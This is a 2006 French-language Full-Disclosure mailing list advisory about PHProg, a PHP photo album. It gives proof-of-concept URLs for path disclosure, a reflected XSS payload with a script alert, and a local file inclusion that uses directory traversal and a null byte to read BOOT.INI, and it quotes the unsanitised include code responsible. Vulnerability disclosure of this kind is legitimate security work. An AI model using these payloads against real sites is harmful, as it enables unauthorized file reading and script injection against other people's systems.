[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] PHProg : Local File Inclusion + XSS + Full path
From:       "..." <cdg393 () gmail ! com>
Date:       2006-09-11 9:03:49
Message-ID: d2c8d5d80609110203q20a6e932gc7d23f6b431d5293 () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


(11/09/06)

* Produit vulnérable : PHProg ( Album photo en PHP )

* Site officiel du produit : http://www.PHProg.com/

* Failles de sécurité décelées :

1] Full path disclosure : http://localhost/PHProg/?id=1&album=cdg393

2] Cross Site Scripting ( XSS ) : http://localhost/PHProg/?id=1&album=
<script>alert('cdg393')</script>

3] Local File Inclusion  :
http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00

     Ligne 59        =>              $lang=$_GET['lang'];
     Ligne 61        =>              include("lang/$lang.php");

* Credits : cdg393 : cdg.new.fr =)

[Attachment #5 (text/html)]

(11/09/06)<br><br>* Produit vulnérable : PHProg ( Album photo en PHP )<br><br>* Site \
officiel du produit : <a \
href="http://www.PHProg.com/">http://www.PHProg.com/</a><br><br>* Failles de sécurité \
décelées :<br><br>1] Full path disclosure :  <a \
href="http://localhost/PHProg/?id=1&amp;album=cdg393">http://localhost/PHProg/?id=1&amp;album=cdg393</a><br><br>2] \
Cross Site Scripting ( XSS ) : <a \
href="http://localhost/PHProg/?id=1&amp;album=">http://localhost/PHProg/?id=1&amp;album=
 </a>&lt;script&gt;alert('cdg393')&lt;/script&gt;<br><br>3] Local File \
Inclusion&nbsp; : <a \
href="http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00">http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00
 </a><br><br>&nbsp;&nbsp;&nbsp;&nbsp; Ligne \
59&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \
=&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \
$lang=$_GET['lang'];<br>&nbsp;&nbsp;&nbsp;&nbsp; Ligne \
61&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \
=&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; \
include(&quot;lang/$lang.php&quot;);<br>&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; \
&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; \
&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; \
&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp; &nbsp;<br>* Credits : cdg393 :  <a \
href="http://cdg.new.fr">cdg.new.fr</a> =) <br><br>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic